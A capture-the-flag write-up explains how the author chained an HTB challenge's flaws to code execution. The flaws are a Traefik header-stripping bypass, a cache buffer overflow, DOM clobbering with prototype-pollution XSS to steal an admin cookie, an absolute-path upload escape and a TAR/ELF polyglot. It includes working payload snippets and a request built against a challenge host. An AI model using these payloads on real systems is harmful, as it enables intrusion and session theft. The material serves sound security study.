[Web] Novacore: A Never-ending Chain (HTB Business CTF)

![[Web] Novacore: A Never-ending Chain (HTB Business CTF)](/images/novacore_writeup.png)

Novacore was an extremely well-designed web security challenge that appeared in Hack the Box’s Global Cyber Skills Benchmark CTF 2025, where companies like Microsoft, Cisco, Intel, Deloitte and KPMG showcased their cybersecurity talents in a one-of-a-kind business CTF. I competed with CTFAE, finishing 7th out of 750 companies.

I solved Novacore when it had 6 solves, and it ended up being the least-solved web challenge, with ~20 solves by the end of the five-day CTF.

The final chain had around 10 vulnerabilities that must be chained together to reach code execution.

In summary, the challenge starts with an access control bypass, followed by a buffer overflow (yes, you heard it right) in a custom keystore implementation, followed by a CSP bypass via an HTML injection to trigger three different DOM clobbering vectors that utilized a diagnostic endpoint to deliver and execute an XSS payload. From there, a file upload bypass combined with an arbitrary file write was used to place a polyglot TAR/ELF payload that we could execute to get RCE; and finally the flag.

This is a beginner-friendly write-up. I’ll break down the challenge, walking you through my mindset, before wrapping it up with a nice 0-to-flag script.

Let’s dig in.

Chapter 0: Just a normal visitor

As usual, let’s first explore the site’s functionality black box.

We start with the landing page:

It seems like a website for trading stocks. It seems to support AI-driven trade. Interesting.

We can try to check the User Dashboard, but are stopped by a login form. Further enumeration does not give any tell-tale vulnerability signs:

We cannot find any means to create an account. How can we register? Checking the Get an Account menu we find this:

It seems invite only. Mmm…

The other About Us, Privacy Policy and For Developers links contain information and promotional material about Novacore and the features of their platform. The For Developers page hints at the existence of a Novacore developer API:

That’s good, let’s delve into the code.

Chapter 1: Code structure

We are given the following tree structure:

From the file structure, it seems like we have a “plugins” feature. These plugins seem to be written in C while the main app itself is written in Python, specifically Flask.

We also notice there is a “datasets” feature with a couple of .tar files in there, perhaps the app is accepting file uploads?

We also notice that the supervisord process runner is used alongside traefik, a popular reverse proxy similar to nginx.

The app is dockerized, here is the Dockerfile:

Apart from a very typical Flask setup, the Dockerfile makes sure to pre-compile the C plugins we saw earlier. It also pulls specific versions of Traefik and Chrome: v2.10.4 and 125.0.6422 respectively.

While we are at it, let’s quickly check the python requirements.txt for versions:

SQLAlchemy==2.0.36

Flask==3.0.3

bcrypt==4.2.0

selenium==4.25.0

requests==2.32.3

schedule==1.2.2

We always want to check versions in case they yield any quick gains from public CVEs. For now, we will note them down and continue our work.

Back on track, let’s see the docker entrypoint.sh to understand how the app is launched:

- flag.txt is relocated to a random location; this typically means our goal is to get RCE.

- There is an admin account with ADMIN_EMAIL and ADMIN_PASS credentials; both are random MD5 hashes.

- The entire app is finally launched via supervisord.

Nice, let’s check what the supervisord configuration looks like:

In this app, supervisord is running as root and is controlling three different processes:

- program:flask: our web server

- program:traefik: reverse proxy

- program:cache: seems to be a custom cache server named aetherCache.

A quick glance at traefik’s configuration:

traefik is configured to listen at tcp/1337 and load a simple dynamic_config.yml:

It is essentially a simple configuration to allow traefik to expose the running Flask server on tcp/1337. For now, it seems like traefik is just a simple passthrough to Flask, nothing fancy.

Before reviewing aetherCache, we want to get a quick summary of the app’s endpoints. An LLM is a great way to do that:

And it was able to generate this beautiful, accurate Markdown sitemap that we can utilize for our reference.

Web Routes (/)

| Method | Path | Description |
|---|---|---|
| GET | / | Home page |
| GET | /get-an-account | Get An Account page |
| GET | /about-us | About Us page |
| GET | /privacy-policy | Privacy Policy page |
| GET | /for-developers | For Developers page |
| GET, POST | /login | Login page and submission |
| GET | /logout | Logout |
| GET | /dashboard | User dashboard |
| GET | /live_signals | View live signals |
| POST | /copy_trade | Copy a signal trade |
| GET | /my_trades | View copied trades |
| GET | /datasets | List uploaded datasets |
| POST | /upload_dataset | Upload dataset |
| GET | /plugins | List available plugins |
| POST | /run_plugin | Execute selected plugin |
| POST | /front_end_error/<action>/<log_level> | Log/view frontend errors |

API Routes (/api)

| Method | Path | Description |
|---|---|---|
| GET, POST | / | API index check |
| GET | /active_signals | Get active signals |
| POST | /copy_signal_trade | Copy a signal to a trade |
| GET | /trades | Get user trades |
| POST | /edit_trade | Edit a user’s trade |

This is extremely helpful. We formed a high-level understanding of the codebase. Next, we will try to find any intriguing features to exploit.

Chapter 2: Some Bot Action

In our earlier review, you might have noticed a juicy bot.py.

A client-side vector is always a delicacy to indulge, let’s have a look:

We do not really care about the Chrome arguments here (although they are sometimes crucial to the solution), we mainly care about the bot’s flow.

The bot logs in, checks its trades at /my_trades for 10 seconds, and then leaves.

Looking at run.py (the main python entrypoint), we can see that the bot logs in every minute:

Chapter 3: Cracking the Shell

Recall that we could not find any means to register an account; even the endpoints we saw earlier did not contain account registration.

This leaves us with a question: how do we interact with Novacore’s internal endpoints?

We have three logical options:

- Find a way to login as the only existing user (admin)

- Find useful unauthenticated endpoints

- Bypass access control

Let’s look at the two Flask routers we have. In web.py, we notice that access control is implemented via the login_required middleware which simply checks for the session.get("loggedin") flag:

This flag is correctly set on successful login at /login:

Most endpoints like /dashboard are protected by the @login_required middleware like so:

There seems to be no way around it.

Reviewing all endpoints in web.py, we find a single endpoint without @login_required:

It seems like a diagnostic endpoint used by the app to report frontend errors, it is left exposed at /front_end_error/<action>/<log_level>.

It accepts two “actions”, new and view. new allows us to set a key to specific JSON payload, while view allows us to read that key. Essentially, it gives us a same-site read-write endpoint which we can use to deliver data to the site or exfiltrate data from it.
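To make the idea concrete, here is a toy in-memory model of that behaviour. It is not the app's code: the class name, method name and return values are made up for illustration, and the only thing taken from the challenge is that the log level segment of the URL doubles as the storage key.

```python
# Toy model of the /front_end_error/<action>/<log_level> primitive.
# Hypothetical names throughout; the real handler lives in web.py.
class FrontEndErrorStore:
    def __init__(self):
        self._logs = {}

    def handle(self, action, log_level, payload=None):
        if action == "new":
            # "new" stores an arbitrary JSON-like payload under the key
            self._logs[log_level] = payload
            return {"status": "stored"}
        if action == "view":
            # "view" hands the stored payload back to whoever asks
            return self._logs.get(log_level)
        return {"error": "unknown action"}


store = FrontEndErrorStore()
store.handle("new", "pollution", {"hello": "world"})
print(store.handle("view", "pollution"))
```

Anyone can write with new and anyone can read with view, which is exactly what makes it usable as a delivery and exfiltration channel.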

This is a very useful primitive that we might need later.

A primitive is a tiny little gimmick or feature that might be meaningless in isolation, but may be combined with other primitives to achieve more powerful vectors leading to successful exploitation.

Our review of web.py netted us one primitive, let’s see what we can find at api.py.



The API has four functions and all of them are protected with another middleware @token_required which is defined as follows:

token_required protects endpoints by checking the Authorization header for an API token, this API token is granted to us on login.

I found it suspicious that the author chose two separate protection mechanisms between web.py and api.py which essentially perform the same thing via different means.

If we look closely, we will notice that token_required() contains a kill switch. The function checks for the existence of the X-Real-Ip header, if it doesn’t exist, the middleware lets go.
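A minimal sketch of that logic, stripped of Flask so it can run on its own. The function name and the valid_tokens argument are assumptions for illustration; the real middleware looks the token up in the database.

```python
def token_required_sketch(headers, valid_tokens):
    """Return True if a request with these headers would be let through."""
    # HTTP header names are case-insensitive, so normalize them first
    normalized = {name.lower(): value for name, value in headers.items()}

    # The kill switch: no X-Real-Ip header is treated as "local request",
    # so the token check is skipped entirely
    if "x-real-ip" not in normalized:
        return True

    # Otherwise the Authorization header must carry a known API token
    return normalized.get("authorization") in valid_tokens


tokens = {"secret-token"}
print(token_required_sketch({"X-Real-Ip": "10.0.0.5"}, tokens))
print(token_required_sketch({"X-Real-Ip": "10.0.0.5", "Authorization": "secret-token"}, tokens))
print(token_required_sketch({}, tokens))
```

The last call is the interesting one: no token, no X-Real-Ip, and the request is still allowed.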

But where is X-Real-Ip being set anyways? It seems like traefik is passing it to Flask, let’s patch our app locally to confirm this. We will add a line on @web.after_request to print received headers:

Waiting a minute for the bot to login and trigger an API call, we receive these:

Notice that since traefik is sitting in front of Flask, it appends a couple of X-* headers to tell Flask what the original IP of the request was; this prevents the reverse proxy from masking the original user.

A request sent to Flask internally, say using curl for example and not through traefik, does not include these X-* headers:

In our token_required middleware there is an implicit assumption that says:

- Every request sent through traefik will have the X-Real-Ip header

- If a request does not have the X-Real-Ip header, it is to be trusted as it must be a local request.

I asked, what if that is not true?



Remember that we noticed that traefik v2.10.4 was used? Now that we understand the role of traefik, we ask ourselves, why?

A few searches online turn up a bunch of 2025 CVEs that were fixed in v2.11.24, a later release than v2.10.4:

We do not really find anything interesting in them. More searching and we find CVE-2024-45410 which reads:

When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application.

Oh, yes! What else?

For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified.

Most certainly! What else??

For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3.

We also find the corresponding GitHub advisory which confirms this ability:

The advisory details that:

It was found that the following headers can be removed in this way (i.e. by specifing them within a connection header):

- X-Forwarded-Host

- X-Forwarded-Port

- X-Forwarded-Proto

- X-Forwarded-Server

- X-Real-Ip

- X-Forwarded-Tls-Client-Cert

- X-Forwarded-Tls-Client-Cert-Info

We send a request to demonstrate the vulnerability:

And we notice that now on the other end, X-Real-Ip got dropped:

Brilliant! A follow up request to /api/trades confirms that we have, indeed, bypassed the API access control:

curl http://94.237.122.124:47098/api/trades -H "Connection: close, X-Real-Ip"

{"trades":[]}
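The same request can be built by hand in Python, which makes it obvious that the whole trick is one extra token in the Connection header. This is a sketch: the helper names and the target.local host are placeholders, and send_raw is only defined here, not called.

```python
import socket


def build_bypass_request(host, path="/api/trades"):
    """Raw HTTP/1.1 request that declares X-Real-Ip as a hop-by-hop header."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        # Listing X-Real-Ip here asks the proxy to drop it before forwarding
        "Connection: close, X-Real-Ip",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def send_raw(host, port, request):
    """Send the raw bytes and return whatever the server answers."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(request)
        chunks = []
        while chunk := sock.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks)


request = build_bypass_request("target.local:1337")
print(request.decode())
```

Calling send_raw("target.local", 1337, request) against a vulnerable instance should behave like the curl command above.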

Chapter 4: Wreaking Havoc

In the last chapter, we analyzed the two primary protection mechanisms in web.py and api.py (the / and /api routers respectively).

In web.py, we couldn’t bypass the login_required() middleware, but we found a same-site read-write primitive at /front_end_error/<action>/<log_level>. On the other hand, on api.py we identified CVE-2024-45410 in the used Traefik version which allowed us to bypass the API’s access control completely.

Let’s see what we can do with our newly found powers.



As seen earlier, the API has features related to managing trades:

| Method | Path | Description |
|---|---|---|
| GET | /active_signals | Get active signals |
| POST | /copy_signal_trade | Copy a signal to a trade |
| GET | /trades | Get user trades |
| POST | /edit_trade | Edit a user’s trade |

Interesting. Remember that the bot account is periodically checking his trades? Maybe we can serve him some malicious trades!



Before we do that, let’s check out how data flows to the /my_trades page which the bot lands on.

- my_trades is defined in the my_trades.html template, which displays trades like this:

Needless to say, the three properties, action, price and symbol are not sanitized giving us an HTML injection vector if we can control them.

Let’s see where they come from.

- The request is handled by /my_trades in web.py:

trade_data is fetched via fetch_cache("trades", session["api_token"]) before getting rendered to the user. How does fetch_cache work though?

- fetch_cache is defined in general.py:

Turns out, fetch_cache is a wrapper that calls /api/trades internally via requests; it also sends the Authorization token received from the user’s session.

Let’s see where the API in turn gets these trades from.

- The /api/trades API endpoint is a wrapper around the AetherCacheClient:

It first grabs a cache_session by instantiating AetherCacheClient, then gets all keys stored in the cache.

The function gets the current user’s ID user_id stored on the global Flask request context g and falls back to sys_admin if it is not set.

The function then extracts all trade signal keys that follow the pattern user:{user_id}:trade: and returns each value after parsing it using parse_signal_data.
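The filtering step can be sketched in a few lines. The function name is made up, and the real endpoint also parses each value with parse_signal_data, which is left out here.

```python
def trade_keys_for(all_keys, user_id=None):
    """Pick the cache keys that belong to one user's trades."""
    # No user on the request context means we fall back to sys_admin
    effective_user = user_id if user_id is not None else "sys_admin"
    prefix = f"user:{effective_user}:trade:"
    return [key for key in all_keys if key.startswith(prefix)]


cache_keys = [
    "signal:17bb0ffc-5b96-44f3-8e86-ec104e68b5df",
    "user:sys_admin:trade:b0edd7e4-c6b8-46ea-9595-b58d5bf41617",
    "user:1:trade:d3c562c3-d575-45e9-922f-0ee9693d16d8",
]
print(trade_keys_for(cache_keys))     # request without a resolved user
print(trade_keys_for(cache_keys, 1))  # request made by user_id 1
```

Keep this prefix match in mind: whoever controls the key controls whose feed a trade shows up in.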

Cool. Let’s go deeper and see how AetherCacheClient works.

- AetherCacheClient is a Python sockets wrapper around the aetherCache.c program:

We can see it offers some convenience methods such as set, get and list_keys. They are all simply sending commands to the underlying key-value store. The raw commands include:

- list

- get <key>

- set <key> <value>

It is a very simple keystore similar to Redis.

Let us confirm these results by logging into the Docker container locally and inspecting the cache.



Interesting. So we have a bunch of signals, and we can read some of them. Let’s try to copy a signal and see what happens:

Nice! Let’s check back at the cache store:

We can see that copying a signal added a new “trade” entry with the generated trade_id.

I patched the app locally to print the admin’s email and password on start. This allows me to debug things locally and view them from an admin’s point of view.

Let’s try to view the trade we just generated as admin:

What? Why is it empty? Let’s see what happens when we copy a trade as admin from the Live Signals page:

Going back to My Trades, we can see that our trade signal was copied correctly!

Let’s see what that looks like in our cache locally:

Aha! We can see a difference. The admin account has a user_id of 1. The /api/trades endpoint we saw earlier filtered trades based on the user_id:

It turns out, because we accessed the API unconventionally using our Traefik bypass, we are not given a “real” user session. This is because we bypassed token_required which queried and linked us with our respective user_id:

So even though we have full access to the API, we are given a fallback sys_admin user, which cannot make requests on behalf of the bot’s admin user with user_id = 1.

This is a bummer! How will we write trades that can poison the bot’s feed now?

Going back to the drawing board, we identify a very critical part of the application that we have not explored yet. The aetherCache key store!

Let’s inspect cache/aetherCache.c. A quick look at variable declarations:



It is very interesting that they have fixed KEY_SIZE and VALUE_SIZE equal to 256 bytes. Fixed size buffers are problematic if not handled properly. Let’s see how keys are set:

Interestingly, the developer took great care to make sure set operations are synchronized using pthread_mutex_lock and pthread_mutex_unlock. However, a look at how the new value is set, we find the disastrous usage of strcpy(entries[i].value, value).

We all know that strcpy is an unsafe function that does not check bounds. In this case, supplying a value longer than 256 bytes will lead to a stack-based buffer overflow that can overwrite the key of the next entry!

To confirm this, let’s try something fun. Let’s first check the cache:

We can imagine what that looks like on the stack; our two trade entries would be placed like this:

Let’s see what happens if we set the user:sys_admin:trade entry to a value greater than 256:

Then set a key to it (locally):

signal:17bb0ffc-5b96-44f3-8e86-ec104e68b5df

signal:a6598f42-8457-46ad-bf3a-b5aa2d97d0b6

signal:24c9fd30-9a88-421e-a65b-eabb2938d457

signal:42d56d70-1322-4f6a-b89c-c8b49986ab6f

signal:2e76d99f-afbc-4ef2-a06e-ef5123d13613

user:sys_admin:trade:b0edd7e4-c6b8-46ea-9595-b58d5bf41617

user:1:trade:d3c562c3-d575-45e9-922f-0ee9693d16d8

set user:sys_admin:trade:b0edd7e4-c6b8-46ea-9595-b58d5bf41617 AAA ... x256 ... AAAaelmo

STORED

list

signal:17bb0ffc-5b96-44f3-8e86-ec104e68b5df

signal:a6598f42-8457-46ad-bf3a-b5aa2d97d0b6

signal:24c9fd30-9a88-421e-a65b-eabb2938d457

signal:42d56d70-1322-4f6a-b89c-c8b49986ab6f

signal:2e76d99f-afbc-4ef2-a06e-ef5123d13613

user:sys_admin:trade:b0edd7e4-c6b8-46ea-9595-b58d5bf41617

aelmo

And this is what it looks like locally:

Amazing! We’ve successfully overwritten the key of the next entry using a buffer overflow in the cache store. This means we can spoof - or create - trades on behalf of any other user!
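If you prefer to see the memory move, the overflow can be simulated in Python with a flat bytearray. This is a model under an assumption, not the C code: each entry is taken to be a 256-byte key immediately followed by a 256-byte value, with entries packed back to back. The helper names are made up.

```python
KEY_SIZE = 256
VALUE_SIZE = 256
ENTRY_SIZE = KEY_SIZE + VALUE_SIZE  # assumed layout: key, then value


def strcpy(memory, offset, text):
    """Copy text plus a NUL terminator with no bounds check, like C strcpy."""
    raw = text.encode() + b"\x00"
    memory[offset:offset + len(raw)] = raw


def read_c_string(memory, offset):
    """Read bytes from offset up to the first NUL, like printf("%s")."""
    end = memory.index(b"\x00", offset)
    return memory[offset:end].decode()


def key_offset(index):
    return index * ENTRY_SIZE


def value_offset(index):
    return index * ENTRY_SIZE + KEY_SIZE


# Two adjacent entries: ours first, the admin's right after it
memory = bytearray(ENTRY_SIZE * 2)
strcpy(memory, key_offset(0), "user:sys_admin:trade:b0edd7e4-c6b8-46ea-9595-b58d5bf41617")
strcpy(memory, key_offset(1), "user:1:trade:d3c562c3-d575-45e9-922f-0ee9693d16d8")

# 256 bytes of padding fill our value buffer; the rest spills into the next key
strcpy(memory, value_offset(0), "A" * VALUE_SIZE + "aelmo")

overwritten_key = read_c_string(memory, key_offset(1))
print(overwritten_key)  # prints aelmo
```

Swap aelmo for a key of the form user:1:trade:<id> and the second entry now belongs to the admin's feed.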

A quick review of the API shows us that this buffer overflow is exposed via the edit_trade function which gives us the opportunity to set the cache however we wish.

The function does not enforce any restrictions on the value set nor its length:

We can supply a JSON object with either symbol, action or price and it will format it correctly and send a set command to the underlying vulnerable cache!

Precise exploitation of this vector will be needed when we come to writing our solver; for now it’s enough to know that we can modify the admin account’s trades. On to the HTML injection.

Chapter 5: Everybody Gets a Clobber!

As we saw in the last chapter, we identified a stack-based buffer overflow in the custom cache implementation. The vulnerability is exposed via the /api/edit_trade endpoint and allows us to control trades for any user, even ones we do not own including admin at user_id 1.

Since trades are reflected, sans sanitization, on the My Trades page, we can perform XSS! Or can we?

A quick look at the app shows us that it is using XSS’ top nemesis: Content Security Policy.

All sources are set to self while scripts require a nonce that is generated securely per request. This CSP is applied indiscriminately on all requests.
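For readers who have not met nonce-based CSPs before, this is roughly what such a policy looks like when generated per request. The exact directive list used by Novacore is not reproduced here; the two directives and the helper names below are assumptions for illustration.

```python
import secrets


def new_nonce():
    """Fresh, unguessable value for every response."""
    return secrets.token_urlsafe(16)


def build_csp(nonce):
    """Everything from 'self', scripts only when they carry the nonce."""
    return f"default-src 'self'; script-src 'self' 'nonce-{nonce}'"


nonce = new_nonce()
print(build_csp(nonce))
```

An injected script tag cannot know the nonce ahead of time, so the browser refuses to run it. Scripts the site itself ships are a different story.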



Let’s see if the website’s own JavaScript, the one that already has the nonce provided to it and is allowed to run, may be vulnerable. If we can inject our own JS in one of these approved scripts, we will essentially bypass the CSP.

Inspecting the site, we find a custom JS file imported in all dashboard pages:

If we can find a vulnerability in this script that would allow us to execute our own code, we may be able to achieve XSS.

Let’s inspect it:

This piece of JavaScript has lots going on, but it’s quite simple once we trace it step-by-step. I traced it in reverse, starting from the eval function which would give us client-side execution:

Take a deep breath, and let’s say it in one go:

To get XSS we need to control configKeysLength, which is equal to logData.config.length, which follows a recursive merge between logData and data, which is received from a call to /front_end_error/new/ at the LOG_LEVEL.attributes.int.nodeValue log level. All of this requires window.UI_DEV_MODE to be set and an error to be triggered in the wrapping try block.

How can we achieve all of that? This took some time and experimentation, but let’s do a forward pass through it:

- First, we can trigger an error within the try {} block by DOM clobbering document.getElementById. This can be achieved using <img name=getElementById> (Yea, I also didn’t know)

- Once within the catch {} block, we can satisfy the if condition by clobbering window.UI_DEV_MODE. This can be achieved using <a id=UI_DEV_MODE>

- Once we get to the fetch, we easily make it return our own user-controlled JSON payload by accessing our same-site read-write primitive found earlier at /front_end_error/view/pollution. This can be achieved via DOM clobbering to path traversal using <a id=LOG_LEVEL int='../view/pollution'>

- Once we are at merge(logData, data), we can pollute the .length parameter with our final XSS by sending a JSON object like {"__proto__": {"length": "alert(document.origin)//"}}

The data flow looks like this:

Essentially, once all constraints are in place, our XSS payload will be delivered via our read-write primitive found earlier and get executed.
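The two pieces we need to deliver can be generated with a couple of small Python helpers. This is a sketch with made-up function names; the markup and the JSON shape are the ones listed in the steps above, and pollution is just the key we chose for the read-write primitive.

```python
import json


def build_clobber_html(log_key="pollution"):
    """HTML injected into a trade field: three DOM clobbering gadgets."""
    return (
        "<img name=getElementById>"                    # break document.getElementById
        "<a id=UI_DEV_MODE>"                           # make window.UI_DEV_MODE truthy
        f"<a id=LOG_LEVEL int='../view/{log_key}'>"    # redirect the fetch to our data
    )


def build_pollution_json(javascript):
    """JSON stored in the primitive: pollutes .length with our JS."""
    # The trailing // comments out whatever the script appends after it
    return json.dumps({"__proto__": {"length": javascript + "//"}})


html_payload = build_clobber_html()
json_payload = build_pollution_json("alert(document.origin)")
print(html_payload)
print(json_payload)
```

The HTML goes into a trade via the cache overflow, the JSON goes into /front_end_error/new/pollution, and the site's own script connects the two.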

Our payload can also use the same read-write primitive to exfiltrate the bot’s admin non-HttpOnly cookie since the primitive is same-site. If this wasn’t available, a simple window.location.href redirect would also be a valid exfiltration method, since top-level navigations are not restricted by this CSP.

Note: The final payload and how everything will be glued together is part of the last chapter where we automate this whole chain.

With the admin cookie in hand, we will assume admin privileges from now on. Let’s find our way to code execution.

Chapter 6: Popping calc.exe (Metaphorically)

An RCE is always made of two components:

- Write data

- Execute data

Let’s see where we can find these two components within our newly-gained admin capabilities.

We quickly spot two fantastic candidates in web.py:

- @web.route("/upload_dataset", methods=["POST"])

- @web.route("/run_plugin", methods=["POST"])

The first route allows us to upload datasets to /app/application/datasets as tar archives:

While the second allows us to execute any of our pre-compiled plugins found at /app/application/plugins:

One writes to /app/application/datasets while the other executes from /app/application/plugins. That gap complicates things.

Inspecting the dataset endpoint, we can see this operation performed at the end:

This is unsafe as it trusts file.filename, passing it as a second argument to os.path.join.

However, file.filename itself gets validated earlier using check_dataset_filename and is_tar_file as follows:

The first function allows us to conveniently use dots and slashes in our file name:

While the second function restricts us to a .tar ending:

That will do for us. It allows us to upload to any location by setting our uploaded filename to an absolute path with a .tar ending a la /app/application/plugins/aaaaaa.tar.
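If the absolute path trick is new to you, it is documented behaviour of os.path.join: when a later component is absolute, everything before it is thrown away. A quick demonstration, using posixpath (which is what os.path resolves to on Linux) so it behaves the same on any machine:

```python
import posixpath  # os.path is posixpath on Linux

DATASET_DIR = "/app/application/datasets"

# A well-behaved filename stays inside the datasets directory
normal = posixpath.join(DATASET_DIR, "prices.tar")
print(normal)   # prints /app/application/datasets/prices.tar

# An absolute filename discards DATASET_DIR entirely
escaped = posixpath.join(DATASET_DIR, "/app/application/plugins/aaaaaa.tar")
print(escaped)  # prints /app/application/plugins/aaaaaa.tar
```

No ../ sequences are needed, which is why the dots-and-slashes filename check does not stand in our way.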

What about the file’s contents? Do we have any restrictions regarding those? Yes, we do:

is_tar_content is defined in general.py as follows:

The function calls exiftool on the dataset file and confirms that at least one line of exiftool’s output contains the phrases file type and tar.

We could think of two ways to bypass this, but neither works:

- A race condition where we execute the file quickly while it’s on disk before exiftool returns its output.

  - This won’t work because during the exiftool check upload_dataset keeps the uploaded file at a random location within /tmp.

- Give the uploaded file a filename of file type.tar which would trivially bypass the exiftool check.

  - This won’t work because the file is given a uuidv4 filename during the check, and check_dataset_filename prohibits spaces in the filename.

Umm… What can we do then? This destroys our calc.exe dreams.

Our file must be a tar to be recognized by exiftool as tar. It also must be an executable, well, to be executed.

Enter polyglot files. A file can carry the characteristics of multiple types at once without one compromising the other. There is a whole database of possible combinations:

And an excellent low-level explanation of how this is even possible:

Long story short, the TAR magic number is placed at offset 0x101. If we write the TAR magic number at that offset within an ELF, let’s see…

We will compile a basic C program:

Let’s check its type:

Let’s make a tiny modification at offset 0x101 (257):

And check again:

Apart from the warning on the last line, File Type did change to TAR! But wait a second… can we still run the ELF?

Incredible! It runs! We can now bypass all file upload restrictions, put a file anywhere we want, and bypass file content checks via a crafted polyglot TAR/ELF file that we can remotely execute on the target.
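In Python, the same patch is a few lines. Treat this as a sketch under assumptions: the function name is made up, and the magic written here is the POSIX ustar signature followed by its 00 version field, which may differ from the exact bytes you choose to write. Whether the patched binary still runs depends on what the ELF happens to store at that offset, so always test it.

```python
TAR_MAGIC_OFFSET = 0x101       # 257, where TAR readers look for the magic
TAR_MAGIC = b"ustar\x0000"     # "ustar" + NUL + version "00" (assumed variant)


def make_tar_polyglot(elf_bytes):
    """Return a copy of the ELF with the TAR magic stamped at offset 0x101."""
    if elf_bytes[:4] != b"\x7fELF":
        raise ValueError("input does not start with the ELF magic")
    if len(elf_bytes) < TAR_MAGIC_OFFSET + len(TAR_MAGIC):
        raise ValueError("input is too small to hold the TAR magic")
    patched = bytearray(elf_bytes)
    patched[TAR_MAGIC_OFFSET:TAR_MAGIC_OFFSET + len(TAR_MAGIC)] = TAR_MAGIC
    return bytes(patched)


# Stand-in for a real binary: ELF magic followed by zero padding
fake_elf = b"\x7fELF" + b"\x00" * 600
polyglot = make_tar_polyglot(fake_elf)
print(polyglot[:4], polyglot[0x101:0x106])
```

The file keeps its length and its ELF header; only eight bytes in the middle change.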

In the next - and final - chapter, we will be scripting everything we found so far into one neat chain that automatically generates everything from 0 to flag.

Chapter 7: Scripting Time!

Let’s put everything we did so far together in one auto-flag python script.

We will build the script piece by piece, then showcase the complete script at the end.

Let’s start by importing the modules we need:

Notably, we will use subprocess to automate compiling our custom plugin executable inside the target’s Docker environment, io to craft our polyglot ELF, and of course httpx to communicate with our target.

We could avoid the Docker step by compiling a static executable, or even by doing it manually and copying the payload from Docker. I chose to automate it for the fun of it.

First step is to get the Docker container which we are going to compile our plugin inside:

We used --quiet and filtered by nova to get the id of the Novacore container I am running locally.

Let’s write and compile the plugin on the container we identified:

Nice! This should write the plugin to /tmp/plugin.c and compile it to /tmp/plugin.

Next, let’s exfiltrate it. A safe way to grab the binary is to encode it as base64 (I tried reading the bytes directly into Python but that failed for some reason):

Next, we will make sure to decode the encoded binary and modify it at offset 0x101 to make it an ELF/TAR polyglot:

With the executable in hand, let’s set front_end_error to serve our prototype pollution to XSS payload:

Notice the Connection header we attached to this client to abuse the traefik CVE identified earlier.

With the XSS ready to be served, let’s poison the bot’s trades feed to execute our XSS. First, let’s query active signals:

We need to copy any active signal, I will be using the first one and copy it until we have two trades:

It is important to copy two trades because aetherCache keeps an integer entry_count that only gets incremented when we legitimately set a new key:

Since it is also on the stack, we technically could overflow it too; however it is much simpler to just make two trades and overflow the first into the second.

We can then edit the first of the two trades to overflow it onto the second. This part is tricky as we need to craft a precise payload with all paddings calculated precisely:

With our payload crafted, let’s send it to /api/edit_trade:

If all is good, the bot’s feed should be poisoned at this point, let us wait for around a minute, then check our exfiltrated cookie session:

With this session in hand, we can now craft a new admin client:

As an admin, let’s upload a dataset abusing the insecure path join we found earlier. The dataset contains our ELF polyglot:

Next, we simply execute the uploaded plugin using its name:

And grab our flag from the response!

Finale: Complete Solver + Conclusion

Here is the complete script with prints, basic error handling and some polish:

Here is a snippet of it running:

Interestingly, one team noticed that $RANDOM generated integers between 0 and 32767 which means that both email and password are feasibly bruteforce-able.

That team used a bcrypt oracle to bruteforce email and passwords independently, significantly reducing search space. This allowed them to unintendedly bypass a significant portion of the challenge (entire XSS chain).
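To put numbers on that, here is a quick back-of-the-envelope in Python. The candidate generator assumes each credential is the MD5 of the decimal $RANDOM value, optionally with a suffix such as a trailing newline; the exact derivation lives in entrypoint.sh, so adjust accordingly.

```python
import hashlib

RANDOM_MAX = 32767             # bash $RANDOM yields 0..32767
CANDIDATES = RANDOM_MAX + 1    # 32768 possible values per credential


def candidate_hashes(suffix=b""):
    """Yield every possible MD5 hex digest (assumed derivation, see above)."""
    for n in range(CANDIDATES):
        yield hashlib.md5(str(n).encode() + suffix).hexdigest()


# Guessing both values at once versus one after the other
joint_guesses = CANDIDATES ** 2
independent_guesses = CANDIDATES * 2
print(joint_guesses)        # prints 1073741824
print(independent_guesses)  # prints 65536
```

Being able to confirm the email on its own turns about a billion worst-case guesses into about sixty-five thousand.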

And there you have it! A complete walkthrough of HTB’s Novacore challenge.

I hope you enjoyed it. Do not hesitate to leave a comment and let me know what you think of this challenge; you can always contact me on Discord @aelmo1 for questions and remarks.

See you in the next one!